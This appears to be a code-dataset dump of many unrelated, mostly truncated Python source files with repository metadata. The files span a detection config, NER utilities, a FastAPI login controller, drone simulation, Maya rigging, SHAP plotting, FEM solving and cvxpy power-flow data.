in_channels=256,
feat_channels=256,
anchor_generator=dict(
type='AnchorGenerator',
scales=[8],
ratios=[0.5, 1.0, 2.0],
strides=[4, 8, 16, 32, 64]),
bbox_coder=dict(
type='DeltaXYWHBBoxCoder',
target_means=[.0, .0, .0, .0],
target_stds=[1.0, 1.0, 1.0, 1.0]),
loss_cls=dict(
type='CrossEntropyLoss', use_sigmoid=True, loss_weight=1.0),
loss_bbox=dict(type='L1Loss', loss_weight=1.0)),
roi_head=dict(
# type='StandardRoIHead',
_delete_=True,
type='KeypointRoIHead',
output_heatmaps=False,
# keypoint_head=dict(
# type='HRNetKeypointHead',
# num_convs=8,
# in_channels=256,
# features_size=[256, 256, 256, 256],
# conv_out_channels=512,
# num_keypoints=5,
# loss_keypoint=dict(type='MSELoss', loss_weight=50.0)),
keypoint_decoder=dict(type='HeatmapDecodeOneKeypoint', upscale=4),
bbox_roi_extractor=dict(
type='SingleRoIExtractor',
roi_layer=dict(type='RoIAlign', output_size=7, sampling_ratio=0),
out_channels=256,
featmap_strides=[4, 8, 16, 32]),
bbox_head=dict(
type='Shared2FCBBoxHead',
in_channels=256,
fc_out_channels=1024,
roi_feat_size=7,
num_classes=80,
bbox_coder=dict(
type='DeltaXYWHBBoxCoder',
target_means=[0., 0., 0., 0.],
target_stds=[0.1, 0.1, 0.2, 0.2]),
reg_class_agnostic=False,
loss_cls=dict(
type='CrossEntropyLoss', use_sigmoid=False, loss_weight=1.0),
loss_bbox=dict(type='L1Loss', loss_weight=1.0)))
)
#optimizer = dict(lr=0.002)
#lr_config = dict(step=[40, 55])
#total_epochs = 60
| 32.298701 | 77 | 0.542421 |
6a168cae49b57ce434a41c7070da071ca4734fc0
| 3,232 |
py
|
Python
|
maskrcnn_benchmark/layers/roi_align_rotated_3d.py
|
picwoon/As_built_BIM
|
9e6b81e2fd8904f5afd013e21d2db45456c138d5
|
[
"MIT"
] | 2 |
2020-03-05T06:39:03.000Z
|
2020-03-31T12:08:04.000Z
|
maskrcnn_benchmark/layers/roi_align_rotated_3d.py
|
picwoon/As_built_BIM
|
9e6b81e2fd8904f5afd013e21d2db45456c138d5
|
[
"MIT"
] | null | null | null |
maskrcnn_benchmark/layers/roi_align_rotated_3d.py
|
picwoon/As_built_BIM
|
9e6b81e2fd8904f5afd013e21d2db45456c138d5
|
[
"MIT"
] | 1 |
2021-09-24T13:17:40.000Z
|
2021-09-24T13:17:40.000Z
|
# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved.
import torch, math
from torch import nn
from torch.autograd import Function
from torch.autograd.function import once_differentiable
from torch.nn.modules.utils import _pair
from SparseConvNet.sparseconvnet.tools_3d_2d import sparse_3d_to_dense_2d
import _C
roi_align_rotated_3d = _ROIAlignRotated3D.apply
| 34.021053 | 101 | 0.63552 |
6a16ef74b6b87e7acddaab1f4ea03a7e48da5422
| 8,360 |
py
|
Python
|
src/model/utils/utils.py
|
J-CITY/METADATA-EXTRACTOR
|
6bc01a7e4b74a3156c07efc2c80d5519c325dd53
|
[
"Apache-2.0"
] | null | null | null |
src/model/utils/utils.py
|
J-CITY/METADATA-EXTRACTOR
|
6bc01a7e4b74a3156c07efc2c80d5519c325dd53
|
[
"Apache-2.0"
] | null | null | null |
src/model/utils/utils.py
|
J-CITY/METADATA-EXTRACTOR
|
6bc01a7e4b74a3156c07efc2c80d5519c325dd53
|
[
"Apache-2.0"
] | null | null | null |
import numpy as np
import os
from .logger import printLog
UNK = "$UNK$"
NUM = "$NUM$"
NONE = "O"
# Class that iterates over CoNLL Dataset
#Create a dictionary from dataset
def getDictionary(datasets):
printLog("Building dictionary: ")
dictWords = set()
dictTags = set()
for dataset in datasets:
for words, tags in dataset:
dictWords.update(words)
dictTags.update(tags)
printLog("DONE: " + str(len(dictWords)) + " size")
return dictWords, dictTags
def getCharDictionary(dataset):
dictChar = set()
for words, _ in dataset:
for word in words:
dictChar.update(word)
return dictChar
#filename - path wo file with vectors
def getChunks(seq, tags):
"""Given a sequence of tags, group entities and their position
Args:
seq: [4, 4, 0, 0, ...] sequence of labels
tags: dict["O"] = 4
Returns:
list of (chunkType, chunkStart, chunkEnd)
Example:
seq = [4, 5, 0, 3]
tags = {"B-PER": 4, "I-PER": 5, "B-LOC": 3}
result = [("PER", 0, 2), ("LOC", 3, 4)]
"""
default = tags[NONE]
idxToTag = {idx: tag for tag, idx in tags.items()}
chunks = []
chunkType, chunkStart = None, None
for i, tok in enumerate(seq):
# End of a chunk 1
if tok == default and chunkType is not None:
# Add a chunk.
chunk = (chunkType, chunkStart, i)
chunks.append(chunk)
chunkType, chunkStart = None, None
# End of a chunk + start of a chunk!
elif tok != default:
tokChunkClass, tokChunkType = getChunkType(tok, idxToTag)
if chunkType is None:
chunkType, chunkStart = tokChunkType, i
elif tokChunkType != chunkType or tokChunkClass == "B":
chunk = (chunkType, chunkStart, i)
chunks.append(chunk)
chunkType, chunkStart = tokChunkType, i
else:
pass
# end condition
if chunkType is not None:
chunk = (chunkType, chunkStart, len(seq))
chunks.append(chunk)
return chunks
| 32.784314 | 84 | 0.55323 |
6a1710262c6a5f82f36fe3fcc5a0ae77374c7e1e
| 148 |
py
|
Python
|
noxfile.py
|
fatcat2/biggestContributor
|
02f85fc072c460573af8eb6f0f6dcd3a9488af14
|
[
"MIT"
] | 2 |
2018-03-15T14:39:53.000Z
|
2018-03-15T20:34:14.000Z
|
noxfile.py
|
fatcat2/biggestContributor
|
02f85fc072c460573af8eb6f0f6dcd3a9488af14
|
[
"MIT"
] | 6 |
2018-03-16T15:43:27.000Z
|
2020-05-19T19:42:32.000Z
|
noxfile.py
|
fatcat2/biggestContributor
|
02f85fc072c460573af8eb6f0f6dcd3a9488af14
|
[
"MIT"
] | 3 |
2018-03-16T15:36:57.000Z
|
2020-05-19T19:34:47.000Z
|
import nox
FILE_PATHS = ["utils", "main.py"]
| 16.444444 | 37 | 0.675676 |
6a177f73dcbbd6c1d2721285cc1b7c72b4784fb1
| 2,781 |
py
|
Python
|
discordbot/economy/currencies.py
|
minhhoang1023/GamestonkTerminal
|
195dc19b491052df080178c0cc6a9d535a91a704
|
[
"MIT"
] | 1 |
2022-02-18T04:02:52.000Z
|
2022-02-18T04:02:52.000Z
|
discordbot/economy/currencies.py
|
minhhoang1023/GamestonkTerminal
|
195dc19b491052df080178c0cc6a9d535a91a704
|
[
"MIT"
] | null | null | null |
discordbot/economy/currencies.py
|
minhhoang1023/GamestonkTerminal
|
195dc19b491052df080178c0cc6a9d535a91a704
|
[
"MIT"
] | null | null | null |
import os
import df2img
import disnake
import pandas as pd
from PIL import Image
import discordbot.config_discordbot as cfg
from discordbot.config_discordbot import logger
from discordbot.helpers import autocrop_image
from gamestonk_terminal.economy import wsj_model
| 27.81 | 85 | 0.54297 |
6a17d1c656acfd1f8102ff27381a0764e4f0a027
| 3,276 |
py
|
Python
|
aiovectortiler/config_handler.py
|
shongololo/aiovectortiler
|
cfd0008d5ac05baee52a24264f991946324f5a42
|
[
"MIT"
] | 4 |
2016-07-24T20:39:40.000Z
|
2018-12-26T06:43:35.000Z
|
aiovectortiler/config_handler.py
|
songololo/aiovectortiler
|
cfd0008d5ac05baee52a24264f991946324f5a42
|
[
"MIT"
] | 7 |
2016-08-10T16:27:39.000Z
|
2018-10-13T13:16:24.000Z
|
aiovectortiler/config_handler.py
|
songololo/aiovectortiler
|
cfd0008d5ac05baee52a24264f991946324f5a42
|
[
"MIT"
] | 3 |
2016-08-09T03:12:24.000Z
|
2016-11-08T01:17:29.000Z
|
import os
import yaml
import logging
logger = logging.getLogger(__name__)
# the following model structures for recipes / layers / queries allows searching up the chain
# for attributes. If not found in the root recipes level then it will check the server configs.
| 28.99115 | 124 | 0.626984 |
6a17dd33b700261e4940d552334d981b6c74eaed
| 128 |
py
|
Python
|
volksdep/converters/__init__.py
|
repoww/volksdep
|
ceaccd30a29a3ba82bd4f9be0c52b8c99c8d6290
|
[
"Apache-2.0"
] | 271 |
2020-05-22T11:05:19.000Z
|
2022-02-27T13:57:38.000Z
|
volksdep/converters/__init__.py
|
repoww/volksdep
|
ceaccd30a29a3ba82bd4f9be0c52b8c99c8d6290
|
[
"Apache-2.0"
] | 16 |
2020-06-28T09:54:07.000Z
|
2022-01-18T09:08:07.000Z
|
volksdep/converters/__init__.py
|
repoww/volksdep
|
ceaccd30a29a3ba82bd4f9be0c52b8c99c8d6290
|
[
"Apache-2.0"
] | 34 |
2020-05-22T11:08:29.000Z
|
2021-12-18T22:47:06.000Z
|
from .torch2onnx import torch2onnx
from .onnx2trt import onnx2trt
from .torch2trt import torch2trt
from .base import load, save
| 25.6 | 34 | 0.828125 |
6a17e7c4a91ac2e9483c7bdc29806cbac3d7a40c
| 13,237 |
py
|
Python
|
t2vretrieval/models/mlmatch.py
|
Roc-Ng/HANet
|
e679703e9e725205424d87f750358fb4f62ceec5
|
[
"MIT"
] | 34 |
2021-07-26T12:22:05.000Z
|
2022-03-08T03:49:33.000Z
|
t2vretrieval/models/mlmatch.py
|
hexiangteng/HANet
|
31d37ccad9c56ff9422cb4eb9d32e79e7b9bc831
|
[
"MIT"
] | null | null | null |
t2vretrieval/models/mlmatch.py
|
hexiangteng/HANet
|
31d37ccad9c56ff9422cb4eb9d32e79e7b9bc831
|
[
"MIT"
] | 3 |
2021-08-03T06:00:26.000Z
|
2021-12-27T03:26:12.000Z
|
import numpy as np
import torch
import framework.ops
import t2vretrieval.encoders.mlsent
import t2vretrieval.encoders.mlvideo
import t2vretrieval.models.globalmatch
from t2vretrieval.models.criterion import cosine_sim
from t2vretrieval.models.globalmatch import VISENC, TXTENC
| 46.939716 | 156 | 0.694568 |
6a186a13afeea2c9ca39fb78982684eb10c871db
| 3,784 |
py
|
Python
|
bench_fastapi/authentication/controllers/login.py
|
sharkguto/teste_carga
|
56d6e9dcbd3e7b7fe7295d8fcf4b4e8b84943cfb
|
[
"MIT"
] | 1 |
2021-10-14T07:27:47.000Z
|
2021-10-14T07:27:47.000Z
|
bench_fastapi/authentication/controllers/login.py
|
sharkguto/teste_carga
|
56d6e9dcbd3e7b7fe7295d8fcf4b4e8b84943cfb
|
[
"MIT"
] | 4 |
2019-08-06T02:26:32.000Z
|
2021-06-10T21:39:19.000Z
|
bench_fastapi/authentication/controllers/login.py
|
sharkguto/teste_carga
|
56d6e9dcbd3e7b7fe7295d8fcf4b4e8b84943cfb
|
[
"MIT"
] | 1 |
2018-05-11T18:04:41.000Z
|
2018-05-11T18:04:41.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# login.py
# @Author : Gustavo Freitas ([email protected])
# @Link :
# @Date : 12/12/2019, 11:43:07 AM
from typing import Optional, Any
from fastapi import APIRouter, Body, Depends, HTTPException
from fastapi import Header, Security
from authentication.models.users import User
from fastapi.security import HTTPBasic, HTTPBasicCredentials, APIKeyHeader
from typing import List
from starlette.responses import Response
from fastapi.encoders import jsonable_encoder
from authentication.interfaces.database import database
import jwt
from starlette.status import HTTP_400_BAD_REQUEST, HTTP_401_UNAUTHORIZED
from datetime import datetime, timedelta
from hashlib import sha256
from authentication.interfaces.token import verify_token
router = APIRouter()
security = HTTPBasic(auto_error=True)
api_key = APIKeyHeader(name="x-api-key", auto_error=True)
# @router.post("/login", dependencies=[Depends(verify_token)])
# async def renew_token(x_api_key: str = Header(None)):
# return {"ok": x_api_key}
| 29.795276 | 83 | 0.681818 |
6a190e5eb1440e6a01fc6f170da74507f39571ac
| 6,295 |
py
|
Python
|
dronesym-python/flask-api/src/dronepool.py
|
dilinade/DroneSym
|
30073bd31343bc27c6b8d72e48b4e06ced0c5fe6
|
[
"Apache-2.0"
] | 1 |
2019-03-24T23:50:07.000Z
|
2019-03-24T23:50:07.000Z
|
dronesym-python/flask-api/src/dronepool.py
|
dilinade/DroneSym
|
30073bd31343bc27c6b8d72e48b4e06ced0c5fe6
|
[
"Apache-2.0"
] | null | null | null |
dronesym-python/flask-api/src/dronepool.py
|
dilinade/DroneSym
|
30073bd31343bc27c6b8d72e48b4e06ced0c5fe6
|
[
"Apache-2.0"
] | null | null | null |
#DronePool module which handles interaction with SITLs
from dronekit import Vehicle, VehicleMode, connect
from dronekit_sitl import SITL
from threading import Lock
import node, time
import mavparser
import threadrunner
drone_pool = {}
instance_count = 0
env_test = False
q = None
mq = None
lock = Lock()
| 27.133621 | 187 | 0.707705 |
6a19dea1f3bc079f6c50613369f0699df82e34cf
| 2,365 |
py
|
Python
|
Problemset/longest-string-chain/longest-string-chain.py
|
KivenCkl/LeetCode
|
fcc97c66f8154a5d20c2aca86120cb37b9d2d83d
|
[
"MIT"
] | 7 |
2019-05-08T03:41:05.000Z
|
2020-12-22T12:39:43.000Z
|
Problemset/longest-string-chain/longest-string-chain.py
|
Yuziquan/LeetCode
|
303fc1c8af847f783c4020bd731b28b72ed92a35
|
[
"MIT"
] | 1 |
2021-07-19T03:48:35.000Z
|
2021-07-19T03:48:35.000Z
|
Problemset/longest-string-chain/longest-string-chain.py
|
Yuziquan/LeetCode
|
303fc1c8af847f783c4020bd731b28b72ed92a35
|
[
"MIT"
] | 7 |
2019-05-10T20:43:20.000Z
|
2021-02-22T03:47:35.000Z
|
# @Title: (Longest String Chain)
# @Author: KivenC
# @Date: 2019-05-26 20:35:25
# @Runtime: 144 ms
# @Memory: 13.3 MB
| 33.785714 | 81 | 0.442283 |
6a19e8bf83375a817e65cca3fb4f7daafac8434e
| 21,107 |
py
|
Python
|
IKFK Builder/IKFK_Builder.py
|
ssimbox/ssimbox-rigTools
|
824bc3b90c42ab54d01b4b0007f00e7cc2f2f08c
|
[
"MIT"
] | 1 |
2021-01-19T13:36:42.000Z
|
2021-01-19T13:36:42.000Z
|
IKFK Builder/IKFK_Builder.py
|
ssimbox/sbx-autorig
|
824bc3b90c42ab54d01b4b0007f00e7cc2f2f08c
|
[
"MIT"
] | 2 |
2021-03-29T22:15:08.000Z
|
2021-03-29T22:17:37.000Z
|
IKFK Builder/IKFK_Builder.py
|
ssimbox/ssimbox-rigTools
|
824bc3b90c42ab54d01b4b0007f00e7cc2f2f08c
|
[
"MIT"
] | null | null | null |
from ctrlUI_lib import createClav2, createSphere
import maya.cmds as cmds
import maya.OpenMaya as om
from functools import partial
# Buttons +1 and +3
count = 0
showUI()
| 41.386275 | 140 | 0.607713 |
6a1cf3b76d95e590eb1efa6bc9673c121f9d7242
| 5,128 |
py
|
Python
|
pipng/imagescale-q-m.py
|
nwiizo/joke
|
808c4c998cc7f5b7f6f3fb5a3ce421588a70c087
|
[
"MIT"
] | 1 |
2017-01-11T06:12:24.000Z
|
2017-01-11T06:12:24.000Z
|
pipng/imagescale-q-m.py
|
ShuyaMotouchi/joke
|
808c4c998cc7f5b7f6f3fb5a3ce421588a70c087
|
[
"MIT"
] | null | null | null |
pipng/imagescale-q-m.py
|
ShuyaMotouchi/joke
|
808c4c998cc7f5b7f6f3fb5a3ce421588a70c087
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# Copyright 2012-13 Qtrac Ltd. All rights reserved.
# This program or module is free software: you can redistribute it
# and/or modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version. It is provided for
# educational purposes and is distributed in the hope that it will be
# useful, but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# General Public License for more details.
import argparse
import collections
import math
import multiprocessing
import os
import sys
import Image
import Qtrac
Result = collections.namedtuple("Result", "copied scaled name")
Summary = collections.namedtuple("Summary", "todo copied scaled canceled")
if __name__ == "__main__":
main()
| 36.892086 | 76 | 0.63475 |
6a1f0af3de00ce3a7fdb8765f1bbb9115dd67f60
| 35,122 |
py
|
Python
|
test/integration_test.py
|
NoopDog/azul
|
37614eff627888065c7b0a277b3137b8a587ed51
|
[
"Apache-2.0"
] | null | null | null |
test/integration_test.py
|
NoopDog/azul
|
37614eff627888065c7b0a277b3137b8a587ed51
|
[
"Apache-2.0"
] | null | null | null |
test/integration_test.py
|
NoopDog/azul
|
37614eff627888065c7b0a277b3137b8a587ed51
|
[
"Apache-2.0"
] | null | null | null |
from abc import (
ABCMeta,
)
from concurrent.futures.thread import (
ThreadPoolExecutor,
)
from contextlib import (
contextmanager,
)
import csv
from functools import (
lru_cache,
)
import gzip
from io import (
BytesIO,
TextIOWrapper,
)
import json
import logging
import os
import random
import re
import sys
import threading
import time
from typing import (
AbstractSet,
Any,
Dict,
IO,
List,
Mapping,
Optional,
Sequence,
Tuple,
cast,
)
import unittest
from unittest import (
mock,
)
import uuid
from zipfile import (
ZipFile,
)
import attr
import chalice.cli
from furl import (
furl,
)
from google.cloud import (
storage,
)
from google.oauth2 import (
service_account,
)
from hca.dss import (
DSSClient,
)
from hca.util import (
SwaggerAPIException,
)
from humancellatlas.data.metadata.helpers.dss import (
download_bundle_metadata,
)
from more_itertools import (
first,
one,
)
from openapi_spec_validator import (
validate_spec,
)
import requests
from azul import (
CatalogName,
cached_property,
config,
drs,
)
from azul.azulclient import (
AzulClient,
AzulClientNotificationError,
)
from azul.drs import (
AccessMethod,
)
import azul.dss
from azul.es import (
ESClientFactory,
)
from azul.indexer import (
BundleFQID,
)
from azul.indexer.index_service import (
IndexService,
)
from azul.logging import (
configure_test_logging,
)
from azul.modules import (
load_app_module,
)
from azul.portal_service import (
PortalService,
)
from azul.requests import (
requests_session_with_retry_after,
)
from azul.types import (
JSON,
)
from azul_test_case import (
AlwaysTearDownTestCase,
AzulTestCase,
)
log = logging.getLogger(__name__)
# noinspection PyPep8Naming
catalog = first(config.integration_test_catalogs.keys())
| 40.231386 | 117 | 0.553442 |
6a1f1b69ee306e65ab06cc8411c8b814a7455225
| 4,886 |
py
|
Python
|
server/openapi_server/controllers/data_transformation_controller.py
|
mintproject/MINT-ModelCatalogIngestionAPI
|
026d3495483a3e48ea3c1364d0dda09beeea69e4
|
[
"Apache-2.0"
] | 2 |
2019-05-30T21:33:43.000Z
|
2019-09-27T21:04:38.000Z
|
server/openapi_server/controllers/data_transformation_controller.py
|
mintproject/model-catalog-api
|
2ad7016691891497bba37afe8ceb0fea8fe769e5
|
[
"Apache-2.0"
] | 82 |
2019-10-08T16:35:34.000Z
|
2022-03-15T18:25:27.000Z
|
server/openapi_server/controllers/data_transformation_controller.py
|
mintproject/model-catalog-api
|
2ad7016691891497bba37afe8ceb0fea8fe769e5
|
[
"Apache-2.0"
] | null | null | null |
import connexion
import six
from openapi_server import query_manager
from openapi_server.utils.vars import DATATRANSFORMATION_TYPE_NAME, DATATRANSFORMATION_TYPE_URI
from openapi_server.models.data_transformation import DataTransformation # noqa: E501
from openapi_server import util
def custom_datasetspecifications_id_datatransformations_get(id, custom_query_name=None, username=None): # noqa: E501
"""Gets a list of data transformations related a dataset
Gets a list of data transformations related a dataset # noqa: E501
:param id: The ID of the dataspecification
:type id: str
:param custom_query_name: Name of the custom query
:type custom_query_name: str
:param username: Username to query
:type username: str
:rtype: List[DataTransformation]
"""
return query_manager.get_resource(id=id,
custom_query_name=custom_query_name,
username=username,
rdf_type_uri=DATATRANSFORMATION_TYPE_URI,
rdf_type_name=DATATRANSFORMATION_TYPE_NAME,
kls=DataTransformation)
def datatransformations_get(username=None, label=None, page=None, per_page=None): # noqa: E501
"""List all instances of DataTransformation
Gets a list of all instances of DataTransformation (more information in https://w3id.org/okn/o/sd#DataTransformation) # noqa: E501
:param username: Name of the user graph to query
:type username: str
:param label: Filter by label
:type label: str
:param page: Page number
:type page: int
:param per_page: Items per page
:type per_page: int
:rtype: List[DataTransformation]
"""
return query_manager.get_resource(
username=username,
label=label,
page=page,
per_page=per_page,
rdf_type_uri=DATATRANSFORMATION_TYPE_URI,
rdf_type_name=DATATRANSFORMATION_TYPE_NAME,
kls=DataTransformation)
def datatransformations_id_delete(id, user=None): # noqa: E501
"""Delete an existing DataTransformation
Delete an existing DataTransformation (more information in https://w3id.org/okn/o/sd#DataTransformation) # noqa: E501
:param id: The ID of the DataTransformation to be retrieved
:type id: str
:param user: Username
:type user: str
:rtype: None
"""
return query_manager.delete_resource(id=id,
user=user,
rdf_type_uri=DATATRANSFORMATION_TYPE_URI,
rdf_type_name=DATATRANSFORMATION_TYPE_NAME,
kls=DataTransformation)
def datatransformations_id_get(id, username=None): # noqa: E501
"""Get a single DataTransformation by its id
Gets the details of a given DataTransformation (more information in https://w3id.org/okn/o/sd#DataTransformation) # noqa: E501
:param id: The ID of the DataTransformation to be retrieved
:type id: str
:param username: Name of the user graph to query
:type username: str
:rtype: DataTransformation
"""
return query_manager.get_resource(id=id,
username=username,
rdf_type_uri=DATATRANSFORMATION_TYPE_URI,
rdf_type_name=DATATRANSFORMATION_TYPE_NAME,
kls=DataTransformation)
def datatransformations_id_put(id, user=None, data_transformation=None): # noqa: E501
"""Update an existing DataTransformation
Updates an existing DataTransformation (more information in https://w3id.org/okn/o/sd#DataTransformation) # noqa: E501
:param id: The ID of the DataTransformation to be retrieved
:type id: str
:param user: Username
:type user: str
:param data_transformation: An old DataTransformationto be updated
:type data_transformation: dict | bytes
:rtype: DataTransformation
"""
if connexion.request.is_json:
data_transformation = DataTransformation.from_dict(connexion.request.get_json()) # noqa: E501
return query_manager.put_resource(id=id,
user=user,
body=data_transformation,
rdf_type_uri=DATATRANSFORMATION_TYPE_URI,
rdf_type_name=DATATRANSFORMATION_TYPE_NAME,
kls=DataTransformation)
def datatransformations_post(user=None, data_transformation=None): # noqa: E501
"""Create one DataTransformation
Create a new instance of DataTransformation (more information in https://w3id.org/okn/o/sd#DataTransformation) # noqa: E501
:param user: Username
:type user: str
:param data_transformation: Information about the DataTransformationto be created
:type data_transformation: dict | bytes
:rtype: DataTransformation
"""
if connexion.request.is_json:
data_transformation = DataTransformation.from_dict(connexion.request.get_json()) # noqa: E501
return query_manager.post_resource(
user=user,
body=data_transformation,
rdf_type_uri=DATATRANSFORMATION_TYPE_URI,
rdf_type_name=DATATRANSFORMATION_TYPE_NAME,
kls=DataTransformation)
| 33.465753 | 134 | 0.731068 |
6a1f4e62deeca6901732e02e6f44f1571b8f71c9
| 2,634 |
py
|
Python
|
shap/plots/monitoring.py
|
NunoEdgarGFlowHub/shap
|
6992883fb3470163fcbe2bfacae0bd5f724ed1f8
|
[
"MIT"
] | 8 |
2019-09-23T16:20:40.000Z
|
2021-10-09T20:26:20.000Z
|
shap/plots/monitoring.py
|
NunoEdgarGFlowHub/shap
|
6992883fb3470163fcbe2bfacae0bd5f724ed1f8
|
[
"MIT"
] | 1 |
2019-02-22T10:16:13.000Z
|
2019-02-22T10:16:13.000Z
|
shap/plots/monitoring.py
|
NunoEdgarGFlowHub/shap
|
6992883fb3470163fcbe2bfacae0bd5f724ed1f8
|
[
"MIT"
] | 4 |
2019-06-28T12:50:51.000Z
|
2021-07-02T07:42:18.000Z
|
import numpy as np
import scipy
import warnings
try:
import matplotlib.pyplot as pl
import matplotlib
except ImportError:
warnings.warn("matplotlib could not be loaded!")
pass
from . import labels
from . import colors
def monitoring_plot(ind, shap_values, features, feature_names=None):
""" Create a SHAP monitoring plot.
(Note this function is preliminary and subject to change!!)
A SHAP monitoring plot is meant to display the behavior of a model
over time. Often the shap_values given to this plot explain the loss
of a model, so changes in a feature's impact on the model's loss over
time can help in monitoring the model's performance.
Parameters
----------
ind : int
Index of the feature to plot.
shap_values : numpy.array
Matrix of SHAP values (# samples x # features)
features : numpy.array or pandas.DataFrame
Matrix of feature values (# samples x # features)
feature_names : list
Names of the features (length # features)
"""
if str(type(features)).endswith("'pandas.core.frame.DataFrame'>"):
if feature_names is None:
feature_names = features.columns
features = features.values
pl.figure(figsize=(10,3))
ys = shap_values[:,ind]
xs = np.arange(len(ys))#np.linspace(0, 12*2, len(ys))
pvals = []
inc = 50
for i in range(inc, len(ys)-inc, inc):
#stat, pval = scipy.stats.mannwhitneyu(v[:i], v[i:], alternative="two-sided")
stat, pval = scipy.stats.ttest_ind(ys[:i], ys[i:])
pvals.append(pval)
min_pval = np.min(pvals)
min_pval_ind = np.argmin(pvals)*inc + inc
if min_pval < 0.05 / shap_values.shape[1]:
pl.axvline(min_pval_ind, linestyle="dashed", color="#666666", alpha=0.2)
pl.scatter(xs, ys, s=10, c=features[:,ind], cmap=colors.red_blue)
pl.xlabel("Sample index")
pl.ylabel(truncate_text(feature_names[ind], 30) + "\nSHAP value", size=13)
pl.gca().xaxis.set_ticks_position('bottom')
pl.gca().yaxis.set_ticks_position('left')
pl.gca().spines['right'].set_visible(False)
pl.gca().spines['top'].set_visible(False)
cb = pl.colorbar()
cb.outline.set_visible(False)
bbox = cb.ax.get_window_extent().transformed(pl.gcf().dpi_scale_trans.inverted())
cb.ax.set_aspect((bbox.height - 0.7) * 20)
cb.set_label(truncate_text(feature_names[ind], 30), size=13)
pl.show()
| 33.769231 | 85 | 0.648823 |
6a1f7efcf406b9bcc9bc35cc271b47eed9db309f
| 7,998 |
py
|
Python
|
mod_core.py
|
nokia-wroclaw/innovativeproject-dbshepherd
|
f82f3b36caaf9fcd6d28076051cb92458ba2edd3
|
[
"MIT"
] | null | null | null |
mod_core.py
|
nokia-wroclaw/innovativeproject-dbshepherd
|
f82f3b36caaf9fcd6d28076051cb92458ba2edd3
|
[
"MIT"
] | null | null | null |
mod_core.py
|
nokia-wroclaw/innovativeproject-dbshepherd
|
f82f3b36caaf9fcd6d28076051cb92458ba2edd3
|
[
"MIT"
] | 1 |
2020-02-05T20:02:15.000Z
|
2020-02-05T20:02:15.000Z
|
import re
import os
import cmd
import sys
import common
from getpass import getpass
from kp import KeePassError, get_password
from configmanager import ConfigManager, ConfigManagerError
common.init()
| 29.512915 | 132 | 0.635159 |
6a2025301420406c02ae8d4c4fc4c88641b66f90
| 7,702 |
py
|
Python
|
code/testbed/pde1/FemPde1.py
|
nicolai-schwartze/Masterthesis
|
7857af20c6b233901ab3cedc325bd64704111e16
|
[
"MIT"
] | 1 |
2020-06-13T10:02:02.000Z
|
2020-06-13T10:02:02.000Z
|
code/testbed/pde1/FemPde1.py
|
nicolai-schwartze/Masterthesis
|
7857af20c6b233901ab3cedc325bd64704111e16
|
[
"MIT"
] | null | null | null |
code/testbed/pde1/FemPde1.py
|
nicolai-schwartze/Masterthesis
|
7857af20c6b233901ab3cedc325bd64704111e16
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Created on Mon Apr 13 14:57:32 2020
@author: Nicolai
"""
import sys
import os
importpath = os.path.dirname(os.path.realpath(__file__)) + "/../"
sys.path.append(importpath)
from FemPdeBase import FemPdeBase
import numpy as np
# import from ngsolve
import ngsolve as ngs
from netgen.geom2d import unit_square
import time
import psutil
import gc
if __name__ == "__main__":
fempde1 = FemPde1(True)
print(fempde1.pde_string)
try:
fempde1.exact(np.array([0.5,0.5]))
except:
print(" error message above")
try:
fempde1.approx(np.array([0.5,0.5]))
except:
print(" error message above")
fempde1.solve()
print("-------------------------------------")
print("exact(0.5, 0.5) = {}".format(fempde1.exact(np.array([0.5,0.5]))))
print("approx(0.5, 0.5) = {}".format(fempde1.approx(np.array([0.5,0.5]))))
print("L2 norm to the real solution {}".format(fempde1.normL2()))
print("solving took {} sec".format(fempde1.exec_time))
print("solving uses {} Mb".format(fempde1.mem_consumption/1000000))
from mpl_toolkits.mplot3d import Axes3D
import matplotlib.pyplot as plt
from matplotlib import cm
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
x = y = np.arange(0, 1.01, 0.01)
X, Y = np.meshgrid(x, y)
zs0 = np.array([fempde1.exact(\
np.array([x,y])) for x,y in zip(np.ravel(X), np.ravel(Y))])
Z = zs0.reshape(X.shape)
ax.plot_surface(X, Y, Z, cmap=cm.gnuplot)
fig.tight_layout()
ax.set_xlabel("X0")
ax.set_ylabel("X1")
ax.set_zlabel("f(X0, X1)")
plt.show()
fig.savefig("sol_pde_1.pdf", bbox_inches='tight')
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
x = y = np.arange(0, 1.01, 0.01)
X, Y = np.meshgrid(x, y)
zs0 = np.array([fempde1.approx(\
np.array([x,y])) for x,y in zip(np.ravel(X), np.ravel(Y))])
Z = zs0.reshape(X.shape)
ax.plot_surface(X, Y, Z, cmap=cm.gnuplot)
ax.set_xlabel("X0")
ax.set_ylabel("X1")
ax.set_zlabel("f(X0,X1)")
plt.show()
| 31.695473 | 199 | 0.532849 |
6a20c03889abf01d98da2c14b133084ab0890d44
| 3,324 |
py
|
Python
|
cvxpy/cvxcore/tests/python/364A_scripts/power_lines.py
|
jasondark/cvxpy
|
56aaa01b0e9d98ae5a91a923708129a7b37a6f18
|
[
"ECL-2.0",
"Apache-2.0"
] | 38 |
2015-10-16T16:55:28.000Z
|
2022-02-16T05:06:01.000Z
|
cvxpy/cvxcore/tests/python/364A_scripts/power_lines.py
|
h-vetinari/cvxpy
|
86307f271819bb78fcdf64a9c3a424773e8269fa
|
[
"ECL-2.0",
"Apache-2.0"
] | 28 |
2015-09-16T16:33:23.000Z
|
2021-11-23T07:31:44.000Z
|
cvxpy/cvxcore/tests/python/364A_scripts/power_lines.py
|
h-vetinari/cvxpy
|
86307f271819bb78fcdf64a9c3a424773e8269fa
|
[
"ECL-2.0",
"Apache-2.0"
] | 21 |
2015-09-16T14:56:16.000Z
|
2022-02-16T05:06:03.000Z
|
import numpy as np
from cvxpy import *
import copy
import time
# data for power flow problem
import numpy as np
n = 12 # total number of nodes
m = 18 # number of edges (transmission lines)
k = 4 # number of generators
# transmission line capacities =
TIME = 0
Pmax = np.matrix("""
4.8005,
1.9246,
3.4274,
2.9439,
4.5652,
4.0484,
2.8259,
1.0740,
4.2856,
2.7788,
3.4617,
4.1677,
4.6873,
3.9528,
1.7051,
2.6228,
4.7419,
